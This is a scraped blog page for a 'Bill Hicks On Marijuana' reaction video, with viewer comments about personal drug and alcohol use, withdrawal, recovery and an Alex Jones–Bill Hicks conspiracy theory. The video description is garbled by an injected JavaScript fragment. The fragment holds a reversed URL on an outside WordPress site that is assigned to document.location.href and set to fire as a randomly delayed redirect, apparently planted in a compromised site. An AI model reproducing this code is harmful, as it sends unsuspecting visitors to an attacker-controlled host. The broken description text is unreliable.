Bill Hicks On Marijuana #Reaction

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This is my video recorded with DU Recorder. It’s easy toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to record your screen and livestream. Download link:

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8 thoughts on “Bill Hicks On Marijuana #Reaction”

  1. MFN Jessiah says:

    There's a famous theory that alex is bill id think her hate that but would enjoy being the theory that drives alex crazy

  2. Mikey B says:

    Dude, you are genuinely a nice guy. I smoke weed, have taken LSD and shrooms, speed, E, and so on. I'm also an alcoholic to my shame. But I also realise that all of them have positive and negative effects. For example, Weed is the only thing (including anti-anxiety meds from companies) that helps me with my anxiety and depression. Alcohol, just like Raj helps me talk to people (not just women), LSD and shrooms opened my mind up to possibilities in life and how all things are connected. That said, all of these drugs have definitely effected my ability to conform to the society that wants me to do the 40/40/40 life which btw, I utterly reject. This is the 40/40/40 Peace mate

  3. Bar Barian says:

    Wow two Bills! And you basically repeated my thoughts at the beginning on the subject! Its a shame they cut off the end there where he wraps it up btw.
    Also alcohol… my favourite.Cannabis just never agreed with me… for similar reasons you said. Nothing against it though. I admit, drank so much every day for breakfast and lunch… just to start the day it's almost pointless me saying how much. I was in the music industry where you can do anything! But along with Tranquillisers, alcohol is the only one other drug that can kill you from physical withdrawal.
    I've had grand Mal fits/seizures from it that are dangerous, and just plain terrifying. I finally learned what disorientated really meant! Feel's like a trip to hell and back… I'd apparently scuttle back into a corner and grunt like a caveman at anyone coming near for a while -after all that exciting twitching on the floor and foaming at the mouth! Slowly loved ones faces would swim into view and I'd sometimes just burst into tears because I was so confused. Took benzodiazepines to deal with it.
    Not recommended, if you can have a few beers or whatever…. fine, but be careful simply (not being a dick, it's your life and I believe most in personal responsibility first and foremost) but it's amazing how little it's mentioned that it's even physically addictive. So many people don't know that! Anyway, been sober 7yrs.and got my life back, and incorporate it into my PT work now. (Because working out helped build a wall, and related to what I did as a kid). Not saying that for the AA clap hahaha! I hate that personally, not for me, but of course not against it. Just saying, it's doable if a dick like me can do it!

  4. PUNKem733 says:

    I used to do meth and coke along with weed for almost 5 years. I owned my own business, well paying job, and always handled my business, never got in trouble. I also quit everything, except weed about 19 years ago. Never had a craving for anything after I decided to stop.

  5. Mike Cappadocia says:

    Man, that was cut off just before the best part

  6. Fill Osifer says:

    There's literally a conspiracy that Alex Jones is Bill Hicks

  7. girl di5appearing says:

    What’s with the footage at the end? So distracting!!! Who did that?!!! And it stopped suddenly! I’m angry!!!!

  8. girl di5appearing says:

    There’s an internet theory that Alex Jones was actually a character played by BILL HICKS (who had survived). Obvious BS!!! Although they do look too similar for my liking, including a couple moles on their faces that match. Alex Jones used to joke about being HICKS quite often. I can’t imagine BILL would spend soooo many years playing such a terrible character. Besides, I saw him in his last months and he was very sick. He was dying. Quickly. 🙁

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